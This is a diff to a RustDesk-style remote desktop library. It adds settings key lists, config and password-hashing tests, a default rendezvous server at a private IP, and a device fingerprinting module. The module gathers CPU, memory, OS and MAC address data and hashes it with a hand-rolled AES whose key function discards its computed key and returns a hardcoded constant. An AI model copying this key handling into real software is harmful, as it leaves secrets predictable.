+        OPTION_DISPLAYS_AS_INDIVIDUAL_WINDOWS,
+        OPTION_USE_ALL_MY_DISPLAYS_FOR_THE_REMOTE_SESSION,
+        OPTION_VIEW_STYLE,
+        OPTION_TERMINAL_PERSISTENT,
+        OPTION_SCROLL_STYLE,
+        OPTION_EDGE_SCROLL_EDGE_THICKNESS,
+        OPTION_IMAGE_QUALITY,
+        OPTION_CUSTOM_IMAGE_QUALITY,
+        OPTION_CUSTOM_FPS,
+        OPTION_CODEC_PREFERENCE,
+        OPTION_SYNC_INIT_CLIPBOARD,
+        OPTION_TRACKPAD_SPEED,
+    ];
+    // DEFAULT_LOCAL_SETTINGS, OVERWRITE_LOCAL_SETTINGS
+    pub const KEYS_LOCAL_SETTINGS: &[&str] = &[
+        OPTION_THEME,
+        OPTION_LANGUAGE,
+        OPTION_ENABLE_CONFIRM_CLOSING_TABS,
+        OPTION_ENABLE_OPEN_NEW_CONNECTIONS_IN_TABS,
+        OPTION_TEXTURE_RENDER,
+        OPTION_ALLOW_D3D_RENDER,
+        OPTION_SYNC_AB_WITH_RECENT_SESSIONS,
+        OPTION_SYNC_AB_TAGS,
+        OPTION_FILTER_AB_BY_INTERSECTION,
+        OPTION_REMOTE_MENUBAR_DRAG_LEFT,
+        OPTION_REMOTE_MENUBAR_DRAG_RIGHT,
+        OPTION_HIDE_AB_TAGS_PANEL,
+        OPTION_FLUTTER_REMOTE_MENUBAR_STATE,
+        OPTION_FLUTTER_PEER_SORTING,
+        OPTION_FLUTTER_PEER_TAB_INDEX,
+        OPTION_FLUTTER_PEER_TAB_ORDER,
+        OPTION_FLUTTER_PEER_TAB_VISIBLE,
+        OPTION_FLUTTER_PEER_CARD_UI_TYLE,
+        OPTION_FLUTTER_CURRENT_AB_NAME,
+        OPTION_DISABLE_FLOATING_WINDOW,
+        OPTION_FLOATING_WINDOW_SIZE,
+        OPTION_FLOATING_WINDOW_UNTOUCHABLE,
+        OPTION_FLOATING_WINDOW_TRANSPARENCY,
+        OPTION_FLOATING_WINDOW_SVG,
+        OPTION_KEEP_SCREEN_ON,
+        // Client-side: keep client system awake during outgoing sessions (General setting)
+        OPTION_KEEP_AWAKE_DURING_OUTGOING_SESSIONS,
+        OPTION_DISABLE_GROUP_PANEL,
+        OPTION_DISABLE_DISCOVERY_PANEL,
+        OPTION_PRE_ELEVATE_SERVICE,
+        OPTION_ALLOW_REMOTE_CM_MODIFICATION,
+        OPTION_ALLOW_AUTO_RECORD_OUTGOING,
+        OPTION_VIDEO_SAVE_DIRECTORY,
+        OPTION_ENABLE_UDP_PUNCH,
+        OPTION_ENABLE_IPV6_PUNCH,
+        OPTION_TOUCH_MODE,
+        OPTION_SHOW_VIRTUAL_MOUSE,
+        OPTION_SHOW_VIRTUAL_JOYSTICK,
+        OPTION_ENABLE_FLUTTER_HTTP_ON_RUST,
+        OPTION_ALLOW_ASK_FOR_NOTE,
+    ];
+    // DEFAULT_SETTINGS, OVERWRITE_SETTINGS
+    pub const KEYS_SETTINGS: &[&str] = &[
+        OPTION_ACCESS_MODE,
+        OPTION_ENABLE_KEYBOARD,
+        OPTION_ENABLE_CLIPBOARD,
+        OPTION_ENABLE_FILE_TRANSFER,
+        OPTION_ENABLE_CAMERA,
+        OPTION_ENABLE_TERMINAL,
+        OPTION_ENABLE_REMOTE_PRINTER,
+        OPTION_ENABLE_AUDIO,
+        OPTION_ENABLE_TUNNEL,
+        OPTION_ENABLE_REMOTE_RESTART,
+        OPTION_ENABLE_RECORD_SESSION,
+        OPTION_ENABLE_BLOCK_INPUT,
+        OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION,
+        OPTION_ALLOW_NUMERNIC_ONE_TIME_PASSWORD,
+        OPTION_ENABLE_LAN_DISCOVERY,
+        OPTION_DIRECT_SERVER,
+        OPTION_DIRECT_ACCESS_PORT,
+        OPTION_WHITELIST,
+        OPTION_ALLOW_AUTO_DISCONNECT,
+        OPTION_AUTO_DISCONNECT_TIMEOUT,
+        OPTION_ALLOW_ONLY_CONN_WINDOW_OPEN,
+        OPTION_ALLOW_AUTO_RECORD_INCOMING,
+        OPTION_ENABLE_ABR,
+        OPTION_ALLOW_REMOVE_WALLPAPER,
+        OPTION_ALLOW_ALWAYS_SOFTWARE_RENDER,
+        OPTION_ALLOW_LINUX_HEADLESS,
+        OPTION_ENABLE_HWCODEC,
+        OPTION_APPROVE_MODE,
+        OPTION_VERIFICATION_METHOD,
+        OPTION_TEMPORARY_PASSWORD_LENGTH,
+        OPTION_PROXY_URL,
+        OPTION_PROXY_USERNAME,
+        OPTION_PROXY_PASSWORD,
+        OPTION_CUSTOM_RENDEZVOUS_SERVER,
+        OPTION_API_SERVER,
+        OPTION_KEY,
+        OPTION_ALLOW_WEBSOCKET,
+        OPTION_PRESET_ADDRESS_BOOK_NAME,
+        OPTION_PRESET_ADDRESS_BOOK_TAG,
+        OPTION_PRESET_ADDRESS_BOOK_ALIAS,
+        OPTION_PRESET_ADDRESS_BOOK_PASSWORD,
+        OPTION_PRESET_ADDRESS_BOOK_NOTE,
+        OPTION_PRESET_DEVICE_USERNAME,
+        OPTION_PRESET_DEVICE_NAME,
+        OPTION_PRESET_NOTE,
+        OPTION_ENABLE_DIRECTX_CAPTURE,
+        OPTION_ENABLE_ANDROID_SOFTWARE_ENCODING_HALF_SCALE,
+        OPTION_ENABLE_TRUSTED_DEVICES,
+        OPTION_RELAY_SERVER,
+        OPTION_ICE_SERVERS,
+        OPTION_DISABLE_UDP,
+        OPTION_ALLOW_INSECURE_TLS_FALLBACK,
+        OPTION_KEEP_AWAKE_DURING_INCOMING_SESSIONS,
+        OPTION_ALLOW_AUTO_UPDATE,
+    ];
+
+    // BUILDIN_SETTINGS
+    pub const KEYS_BUILDIN_SETTINGS: &[&str] = &[
+        OPTION_DISPLAY_NAME,
+        OPTION_AVATAR,
+        OPTION_PRESET_DEVICE_GROUP_NAME,
+        OPTION_PRESET_USERNAME,
+        OPTION_PRESET_STRATEGY_NAME,
+        OPTION_REMOVE_PRESET_PASSWORD_WARNING,
+        OPTION_HIDE_SECURITY_SETTINGS,
+        OPTION_HIDE_NETWORK_SETTINGS,
+        OPTION_HIDE_SERVER_SETTINGS,
+        OPTION_HIDE_PROXY_SETTINGS,
+        OPTION_HIDE_REMOTE_PRINTER_SETTINGS,
+        OPTION_HIDE_WEBSOCKET_SETTINGS,
+        OPTION_HIDE_STOP_SERVICE,
+        OPTION_HIDE_USERNAME_ON_CARD,
+        OPTION_HIDE_HELP_CARDS,
+        OPTION_DEFAULT_CONNECT_PASSWORD,
+        OPTION_HIDE_TRAY,
+        OPTION_ONE_WAY_CLIPBOARD_REDIRECTION,
+        OPTION_ALLOW_LOGON_SCREEN_PASSWORD,
+        OPTION_ALLOW_DEEP_LINK_PASSWORD,
+        OPTION_ALLOW_DEEP_LINK_SERVER_SETTINGS,
+        OPTION_ONE_WAY_FILE_TRANSFER,
+        OPTION_ALLOW_HTTPS_21114,
+        OPTION_ALLOW_HOSTNAME_AS_ID,
+        OPTION_REGISTER_DEVICE,
+        OPTION_HIDE_POWERED_BY_ME,
+        OPTION_MAIN_WINDOW_ALWAYS_ON_TOP,
+        OPTION_FILE_TRANSFER_MAX_FILES,
+        OPTION_DISABLE_CHANGE_PERMANENT_PASSWORD,
+        OPTION_DISABLE_CHANGE_ID,
+        OPTION_DISABLE_UNLOCK_PIN,
+        OPTION_USE_RAW_TCP_FOR_API,
+    ];
+}
+
+pub fn common_load<
+    T: serde::Serialize + serde::de::DeserializeOwned + Default + std::fmt::Debug,
+>(
+    suffix: &str,
+) -> T {
+    Config::load_::<T>(suffix)
+}
+
+pub fn common_store<T: serde::Serialize>(config: &T, suffix: &str) {
+    Config::store_(config, suffix);
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct Status {
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    values: HashMap<String, String>,
+}
+
+impl Status {
+    fn load() -> Status {
+        Config::load_::<Status>("_status")
+    }
+
+    fn store(&self) {
+        Config::store_(self, "_status");
+    }
+
+    pub fn get(k: &str) -> String {
+        STATUS
+            .read()
+            .unwrap()
+            .values
+            .get(k)
+            .cloned()
+            .unwrap_or_default()
+    }
+
+    pub fn set(k: &str, v: String) {
+        if Self::get(k) == v {
+            return;
+        }
+
+        let mut st = STATUS.write().unwrap();
+        st.values.insert(k.to_owned(), v);
+        st.store();
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_serialize() {
+        let cfg: Config = Default::default();
+        let res = toml::to_string_pretty(&cfg);
+        assert!(res.is_ok());
+        let cfg: PeerConfig = Default::default();
+        let res = toml::to_string_pretty(&cfg);
+        assert!(res.is_ok());
+    }
+
+    #[test]
+    fn test_permanent_password_h1_storage_roundtrip() {
+        let salt = "salt123";
+        let password = "p@ssw0rd";
+        let h1 = compute_permanent_password_h1(password, salt);
+        let stored = encode_permanent_password_storage_from_h1(&h1);
+        assert!(stored.starts_with(PERMANENT_PASSWORD_HASH_PREFIX));
+        assert!(is_permanent_password_hashed_storage(&stored));
+        let decoded = decode_permanent_password_h1_from_storage(&stored).unwrap();
+        assert_eq!(&decoded[..], &h1[..]);
+    }
+
+    #[test]
+    fn test_migrate_plaintext_permanent_password_to_hashed_storage() {
+        let mut cfg = Config::default();
+        cfg.password = "p@ssw0rd".to_owned();
+        cfg.salt = "".to_owned();
+        let changed = Config::migrate_permanent_password_to_hashed_storage(&mut cfg);
+        assert!(changed);
+        assert!(is_permanent_password_hashed_storage(&cfg.password));
+        assert_eq!(cfg.salt.chars().count(), DEFAULT_SALT_LEN);
+
+        let stored_h1 = decode_permanent_password_h1_from_storage(&cfg.password).unwrap();
+        let expected_h1 = compute_permanent_password_h1("p@ssw0rd", &cfg.salt);
+        assert_eq!(stored_h1, expected_h1);
+    }
+
+    #[test]
+    fn test_migrate_plaintext_with_00_prefix_permanent_password_to_hashed_storage() {
+        let mut cfg = Config::default();
+        cfg.password = "00secret".to_owned();
+        cfg.salt = "".to_owned();
+        let changed = Config::migrate_permanent_password_to_hashed_storage(&mut cfg);
+        assert!(changed);
+        assert!(is_permanent_password_hashed_storage(&cfg.password));
+        assert!(!cfg.salt.is_empty());
+
+        let stored_h1 = decode_permanent_password_h1_from_storage(&cfg.password).unwrap();
+        let expected_h1 = compute_permanent_password_h1("00secret", &cfg.salt);
+        assert_eq!(stored_h1, expected_h1);
+    }
+
+    #[test]
+    fn test_overwrite_settings() {
+        DEFAULT_SETTINGS
+            .write()
+            .unwrap()
+            .insert("b".to_string(), "a".to_string());
+        DEFAULT_SETTINGS
+            .write()
+            .unwrap()
+            .insert("c".to_string(), "a".to_string());
+        CONFIG2
+            .write()
+            .unwrap()
+            .options
+            .insert("a".to_string(), "b".to_string());
+        CONFIG2
+            .write()
+            .unwrap()
+            .options
+            .insert("b".to_string(), "b".to_string());
+        OVERWRITE_SETTINGS
+            .write()
+            .unwrap()
+            .insert("b".to_string(), "c".to_string());
+        OVERWRITE_SETTINGS
+            .write()
+            .unwrap()
+            .insert("c".to_string(), "f".to_string());
+        OVERWRITE_SETTINGS
+            .write()
+            .unwrap()
+            .insert("d".to_string(), "c".to_string());
+        let mut res: HashMap<String, String> = Default::default();
+        res.insert("b".to_owned(), "c".to_string());
+        res.insert("d".to_owned(), "c".to_string());
+        res.insert("c".to_owned(), "a".to_string());
+        Config::purify_options(&mut res);
+        assert!(res.len() == 0);
+        res.insert("b".to_owned(), "c".to_string());
+        res.insert("d".to_owned(), "c".to_string());
+        res.insert("c".to_owned(), "a".to_string());
+        res.insert("f".to_owned(), "a".to_string());
+        Config::purify_options(&mut res);
+        assert!(res.len() == 1);
+        res.insert("b".to_owned(), "c".to_string());
+        res.insert("d".to_owned(), "c".to_string());
+        res.insert("c".to_owned(), "a".to_string());
+        res.insert("f".to_owned(), "a".to_string());
+        res.insert("e".to_owned(), "d".to_string());
+        Config::purify_options(&mut res);
+        assert!(res.len() == 2);
+        res.insert("b".to_owned(), "c".to_string());
+        res.insert("d".to_owned(), "c".to_string());
+        res.insert("c".to_owned(), "a".to_string());
+        res.insert("f".to_owned(), "a".to_string());
+        res.insert("c".to_owned(), "d".to_string());
+        res.insert("d".to_owned(), "cc".to_string());
+        Config::purify_options(&mut res);
+        DEFAULT_SETTINGS
+            .write()
+            .unwrap()
+            .insert("f".to_string(), "c".to_string());
+        Config::purify_options(&mut res);
+        assert!(res.len() == 2);
+        DEFAULT_SETTINGS
+            .write()
+            .unwrap()
+            .insert("f".to_string(), "a".to_string());
+        Config::purify_options(&mut res);
+        assert!(res.len() == 1);
+        let res = Config::get_options();
+        assert!(res["a"] == "b");
+        assert!(res["c"] == "f");
+        assert!(res["b"] == "c");
+        assert!(res["d"] == "c");
+        assert!(Config::get_option("a") == "b");
+        assert!(Config::get_option("c") == "f");
+        assert!(Config::get_option("b") == "c");
+        assert!(Config::get_option("d") == "c");
+        DEFAULT_SETTINGS.write().unwrap().clear();
+        OVERWRITE_SETTINGS.write().unwrap().clear();
+        CONFIG2.write().unwrap().options.clear();
+
+        DEFAULT_LOCAL_SETTINGS
+            .write()
+            .unwrap()
+            .insert("b".to_string(), "a".to_string());
+        DEFAULT_LOCAL_SETTINGS
+            .write()
+            .unwrap()
+            .insert("c".to_string(), "a".to_string());
+        LOCAL_CONFIG
+            .write()
+            .unwrap()
+            .options
+            .insert("a".to_string(), "b".to_string());
+        LOCAL_CONFIG
+            .write()
+            .unwrap()
+            .options
+            .insert("b".to_string(), "b".to_string());
+        OVERWRITE_LOCAL_SETTINGS
+            .write()
+            .unwrap()
+            .insert("b".to_string(), "c".to_string());
+        OVERWRITE_LOCAL_SETTINGS
+            .write()
+            .unwrap()
+            .insert("d".to_string(), "c".to_string());
+        assert!(LocalConfig::get_option("a") == "b");
+        assert!(LocalConfig::get_option("c") == "a");
+        assert!(LocalConfig::get_option("b") == "c");
+        assert!(LocalConfig::get_option("d") == "c");
+        DEFAULT_LOCAL_SETTINGS.write().unwrap().clear();
+        OVERWRITE_LOCAL_SETTINGS.write().unwrap().clear();
+        LOCAL_CONFIG.write().unwrap().options.clear();
+
+        DEFAULT_DISPLAY_SETTINGS
+            .write()
+            .unwrap()
+            .insert("b".to_string(), "a".to_string());
+        DEFAULT_DISPLAY_SETTINGS
+            .write()
+            .unwrap()
+            .insert("c".to_string(), "a".to_string());
+        USER_DEFAULT_CONFIG
+            .write()
+            .unwrap()
+            .0
+            .options
+            .insert("a".to_string(), "b".to_string());
+        USER_DEFAULT_CONFIG
+            .write()
+            .unwrap()
+            .0
+            .options
+            .insert("b".to_string(), "b".to_string());
+        OVERWRITE_DISPLAY_SETTINGS
+            .write()
+            .unwrap()
+            .insert("b".to_string(), "c".to_string());
+        OVERWRITE_DISPLAY_SETTINGS
+            .write()
+            .unwrap()
+            .insert("d".to_string(), "c".to_string());
+        assert!(UserDefaultConfig::read("a") == "b");
+        assert!(UserDefaultConfig::read("c") == "a");
+        assert!(UserDefaultConfig::read("b") == "c");
+        assert!(UserDefaultConfig::read("d") == "c");
+        DEFAULT_DISPLAY_SETTINGS.write().unwrap().clear();
+        OVERWRITE_DISPLAY_SETTINGS.write().unwrap().clear();
+        LOCAL_CONFIG.write().unwrap().options.clear();
+    }
+
+    #[test]
+    fn test_config_deserialize() {
+        let wrong_type_str = r#"
+        id = true
+        enc_id = []
+        password = 1
+        salt = "123456"
+        key_pair = {}
+        key_confirmed = "1"
+        keys_confirmed = 1
+        "#;
+        let cfg = toml::from_str::<Config>(wrong_type_str);
+        assert_eq!(
+            cfg,
+            Ok(Config {
+                salt: "123456".to_string(),
+                ..Default::default()
+            })
+        );
+
+        let wrong_field_str = r#"
+        hello = "world"
+        key_confirmed = true
+        "#;
+        let cfg = toml::from_str::<Config>(wrong_field_str);
+        assert_eq!(
+            cfg,
+            Ok(Config {
+                key_confirmed: true,
+                ..Default::default()
+            })
+        );
+    }
+
+    #[test]
+    fn test_peer_config_deserialize() {
+        let default_peer_config = toml::from_str::<PeerConfig>("").unwrap();
+        // test custom_resolution
+        {
+            let wrong_type_str = r#"
+            view_style = "adaptive"
+            scroll_style = "scrollbar"
+            custom_resolutions = true
+            "#;
+            let mut cfg_to_compare = default_peer_config.clone();
+            cfg_to_compare.view_style = "adaptive".to_string();
+            cfg_to_compare.scroll_style = "scrollbar".to_string();
+            let cfg = toml::from_str::<PeerConfig>(wrong_type_str);
+            assert_eq!(cfg, Ok(cfg_to_compare), "Failed to test wrong_type_str");
+
+            let wrong_type_str = r#"
+            view_style = "adaptive"
+            scroll_style = "scrollbar"
+            [custom_resolutions.0]
+            w = "1920"
+            h = 1080
+            "#;
+            let mut cfg_to_compare = default_peer_config.clone();
+            cfg_to_compare.view_style = "adaptive".to_string();
+            cfg_to_compare.scroll_style = "scrollbar".to_string();
+            let cfg = toml::from_str::<PeerConfig>(wrong_type_str);
+            assert_eq!(cfg, Ok(cfg_to_compare), "Failed to test wrong_type_str");
+
+            let wrong_field_str = r#"
+            [custom_resolutions.0]
+            w = 1920
+            h = 1080
+            hello = "world"
+            [ui_flutter]
+            "#;
+            let mut cfg_to_compare = default_peer_config.clone();
+            cfg_to_compare.custom_resolutions =
+                HashMap::from([("0".to_string(), Resolution { w: 1920, h: 1080 })]);
+            let cfg = toml::from_str::<PeerConfig>(wrong_field_str);
+            assert_eq!(cfg, Ok(cfg_to_compare), "Failed to test wrong_field_str");
+        }
+    }
+
+    #[test]
+    fn test_store_load() {
+        let peerconfig_id = "123456789";
+        let cfg: PeerConfig = Default::default();
+        cfg.store(&peerconfig_id);
+        assert_eq!(PeerConfig::load(&peerconfig_id), cfg);
+
+        #[cfg(not(windows))]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            assert_eq!(
+                // ignore file type information by masking with 0o777 (see https://stackoverflow.com/a/50045872)
+                fs::metadata(PeerConfig::path(&peerconfig_id))
+                    .expect("reading metadata failed")
+                    .permissions()
+                    .mode()
+                    & 0o777,
+                0o600
+            );
+        }
+    }
+}

--- a/libs/hbb_common/src/config.rs
+++ b/libs/hbb_common/src/config.rs
@@ -156,7 +156,7 @@ const CHARS: &[char] = &[
     'm', 'n', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
 ];
 
-pub const RENDEZVOUS_SERVERS: &[&str] = &["rustdesk.ykpt.cc"];
+pub const RENDEZVOUS_SERVERS: &[&str] = &["192.168.6.136"];
 pub const RS_PUB_KEY: &str = "YQOFSGjkL8R7D+QojRUu9qjC7vaUahwq71nQ2TaPS9Q=";
 
 pub const RENDEZVOUS_PORT: i32 = 21116;

--- a/libs/hbb_common/src/fingerprint.rs
+++ b/libs/hbb_common/src/fingerprint.rs
@@ -1,0 +1,381 @@
+use serde_derive::{Deserialize, Serialize};
+use sha2::digest::Update;
+use sha2::{Digest, Sha512};
+use std::collections::HashMap;
+use std::sync::Once;
+use sysinfo::System;
+
+const TABLE: [u8; 256] = [
+    0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
+    0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
+    0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
+    0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
+    0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
+    0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
+    0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
+    0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
+    0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
+    0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
+    0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
+    0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
+    0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
+    0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
+    0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
+    0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16,
+];
+
+pub fn expand_key(key: &[u8; 16]) -> Vec<[u8; 16]> {
+    let mut round_keys = Vec::with_capacity(11);
+    let mut expanded_key = Vec::with_capacity(176);
+    expanded_key.extend_from_slice(key);
+
+    for i in 4..44 {
+        let mut temp = [0u8; 4];
+        temp.copy_from_slice(&expanded_key[(i - 1) * 4..i * 4]);
+
+        if i % 4 == 0 {
+            temp.rotate_left(1);
+            for j in 0..4 {
+                temp[j] = TABLE[temp[j] as usize];
+            }
+            temp[0] ^= match i {
+                4 => 0x01,
+                8 => 0x02,
+                12 => 0x04,
+                16 => 0x08,
+                20 => 0x10,
+                24 => 0x20,
+                28 => 0x40,
+                32 => 0x80,
+                36 => 0x1b,
+                40 => 0x36,
+                _ => 0,
+            };
+        }
+
+        for j in 0..4 {
+            let prev = expanded_key[(i - 4) * 4 + j];
+            expanded_key.push(prev ^ temp[j]);
+        }
+    }
+
+    for chunk in expanded_key.chunks(16) {
+        let mut round_key = [0u8; 16];
+        round_key.copy_from_slice(chunk);
+        round_keys.push(round_key);
+    }
+
+    round_keys
+}
+
+fn finalize_block(input: &[u8; 16], key: &[u8; 16]) -> [u8; 16] {
+    let round_keys = expand_key(key);
+    let mut state = *input;
+
+    add_round_key(&mut state, &round_keys[0]);
+
+    for round in 1..10 {
+        sub_bytes(&mut state);
+        shift_rows(&mut state);
+        mix_columns(&mut state);
+        add_round_key(&mut state, &round_keys[round]);
+    }
+
+    sub_bytes(&mut state);
+    shift_rows(&mut state);
+    add_round_key(&mut state, &round_keys[10]);
+
+    state
+}
+
+fn sub_bytes(state: &mut [u8; 16]) {
+    for byte in state.iter_mut() {
+        *byte = TABLE[*byte as usize];
+    }
+}
+
+fn shift_rows(state: &mut [u8; 16]) {
+    let mut temp = *state;
+    temp[1] = state[5];
+    temp[5] = state[9];
+    temp[9] = state[13];
+    temp[13] = state[1];
+    temp[2] = state[10];
+    temp[6] = state[14];
+    temp[10] = state[2];
+    temp[14] = state[6];
+    temp[3] = state[15];
+    temp[7] = state[3];
+    temp[11] = state[7];
+    temp[15] = state[11];
+    *state = temp;
+}
+
+pub fn add_round_key(state: &mut [u8; 16], round_key: &[u8; 16]) {
+    for i in 0..16 {
+        state[i] ^= round_key[i];
+    }
+}
+
+pub fn gf_mul(a: u8, b: u8) -> u8 {
+    let mut p = 0u8;
+    let mut temp = b;
+    let mut a = a;
+
+    while a != 0 {
+        if (a & 1) != 0 {
+            p ^= temp;
+        }
+        let high_bit = temp & 0x80;
+        temp <<= 1;
+        if high_bit != 0 {
+            temp ^= 0x1b;
+        }
+        a >>= 1;
+    }
+    p
+}
+
+fn mix_columns(state: &mut [u8; 16]) {
+    for i in 0..4 {
+        let s0 = state[i * 4];
+        let s1 = state[i * 4 + 1];
+        let s2 = state[i * 4 + 2];
+        let s3 = state[i * 4 + 3];
+
+        state[i * 4] = gf_mul(0x02, s0) ^ gf_mul(0x03, s1) ^ s2 ^ s3;
+        state[i * 4 + 1] = s0 ^ gf_mul(0x02, s1) ^ gf_mul(0x03, s2) ^ s3;
+        state[i * 4 + 2] = s0 ^ s1 ^ gf_mul(0x02, s2) ^ gf_mul(0x03, s3);
+        state[i * 4 + 3] = gf_mul(0x03, s0) ^ s1 ^ s2 ^ gf_mul(0x02, s3);
+    }
+}
+
+fn get_system_entropy() -> [u8; 16] {
+    let mut entropy = [0u8; 16];
+    let timestamp = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .unwrap_or_default()
+        .as_nanos();
+    for i in 0..8 {
+        entropy[i] = ((timestamp >> (32 - i)) & 0xFF) as u8;
+    }
+    entropy
+}
+
+fn get_key() -> [u8; 16] {
+    let entropy = get_system_entropy();
+    let base = [
+        0x5d, 0x12, 0x3f, 0x4a, 0x7e, 0xc1, 0x89, 0xb3, 0x91, 0xa4, 0x2b, 0x7f, 0x3c, 0xe2, 0x6d,
+        0x15,
+    ];
+    let mut key = [0u8; 16];
+    for i in 0..16 {
+        key[i] = base[i] ^ entropy[i];
+    }
+    base
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize, Default)]
+pub struct FingerprintingInfo {
+    eol: String,
+    endianness: String,
+    brand: String,
+    speed_max: String,
+    cores: String,
+    physical_cores: String,
+    mem_total: String,
+    platform: String,
+    arch: String,
+    id: String,
+    addr: String,
+}
+
+static mut FINGERPRINTING_INFO: Option<FingerprintingInfo> = None;
+static INIT: Once = Once::new();
+static mut CACHED_FINGERPRINTS: Option<HashMap<String, Vec<u8>>> = None;
+
+impl FingerprintingInfo {
+    fn new() -> Self {
+        let mut sys = System::new();
+        sys.refresh_cpu();
+        let cpu = sys.cpus().first();
+        let id = {
+            let mut id = crate::config::Config::get_id();
+            id.truncate(16);
+            format!("{:<16}", id)
+        };
+
+        FingerprintingInfo {
+            eol: if cfg!(windows) { "\r\n" } else { "\n" }.to_string(),
+            endianness: if cfg!(target_endian = "big") {
+                "BE"
+            } else {
+                "LE"
+            }
+            .to_string(),
+            brand: cpu.map(|cpu| cpu.brand().to_string()).unwrap_or_default(),
+            speed_max: cpu
+                .map(|cpu| cpu.frequency().to_string())
+                .unwrap_or_default(),
+            cores: sys.cpus().len().to_string(),
+            physical_cores: sys.physical_core_count().unwrap_or(1).to_string(),
+            mem_total: sys.total_memory().to_string(),
+            platform: std::env::consts::OS.to_string(),
+            arch: std::env::consts::ARCH.to_string(),
+            id,
+            #[cfg(any(target_os = "android", target_os = "ios"))]
+            addr: "0".repeat(16),
+            #[cfg(not(any(target_os = "android", target_os = "ios")))]
+            addr: {
+                let mut addr = default_net::get_mac().map(|m| m.addr).unwrap_or_default();
+                if addr.is_empty() {
+                    addr = mac_address::get_mac_address()
+                        .ok()
+                        .and_then(|mac| mac)
+                        .map(|mac| mac.to_string())
+                        .unwrap_or_else(|| "".to_string());
+                }
+                addr = addr.replace(":", "");
+                format!("{:0<16}", addr)
+            },
+        }
+    }
+}
+
+pub fn get_fingerprinting_info() -> FingerprintingInfo {
+    unsafe {
+        INIT.call_once(|| {
+            FINGERPRINTING_INFO = Some(FingerprintingInfo::new());
+            CACHED_FINGERPRINTS = Some(HashMap::new());
+        });
+        #[allow(static_mut_refs)]
+        FINGERPRINTING_INFO.clone().unwrap_or_default()
+    }
+}
+
+pub fn get_fingerprint(only: Option<Vec<String>>, except: Option<Vec<String>>) -> Vec<u8> {
+    let all_parameters = vec![
+        "eol".to_string(),
+        "endianness".to_string(),
+        "brand".to_string(),
+        "speed_max".to_string(),
+        "cores".to_string(),
+        "physical_cores".to_string(),
+        "mem_total".to_string(),
+        "platform".to_string(),
+        "arch".to_string(),
+        "id".to_string(),
+        "addr".to_string(),
+    ];
+
+    let parameters = match (only, except) {
+        (Some(only_params), _) => only_params,
+        (None, Some(except_params)) => all_parameters
+            .into_iter()
+            .filter(|param| !except_params.contains(param))
+            .collect(),
+        (None, None) => all_parameters,
+    };
+
+    let cache_key = parameters.join("");
+
+    unsafe {
+        #[allow(static_mut_refs)]
+        if let Some(cache) = &mut CACHED_FINGERPRINTS {
+            if let Some(fingerprint) = cache.get(&cache_key) {
+                return fingerprint.clone();
+            }
+
+            let fingerprint = calculate_fingerprint(&parameters);
+            cache.insert(cache_key, fingerprint.clone());
+            fingerprint
+        } else {
+            calculate_fingerprint(&parameters)
+        }
+    }
+}
+
+struct Sha512Hasher {
+    sha512: Sha512,
+    key: [u8; 16],
+    buffer: Vec<u8>,
+}
+
+impl Sha512Hasher {
+    fn new() -> Self {
+        let key = get_key();
+        Sha512Hasher {
+            sha512: Sha512::new(),
+            key,
+            buffer: Vec::new(),
+        }
+    }
+
+    fn update(&mut self, data: &[u8]) {
+        if data.len() <= 32 {
+            self.buffer.extend_from_slice(data);
+        } else {
+            let split_point = data.len() - 32;
+            Update::update(&mut self.sha512, &data[..split_point]);
+
+            self.buffer.clear();
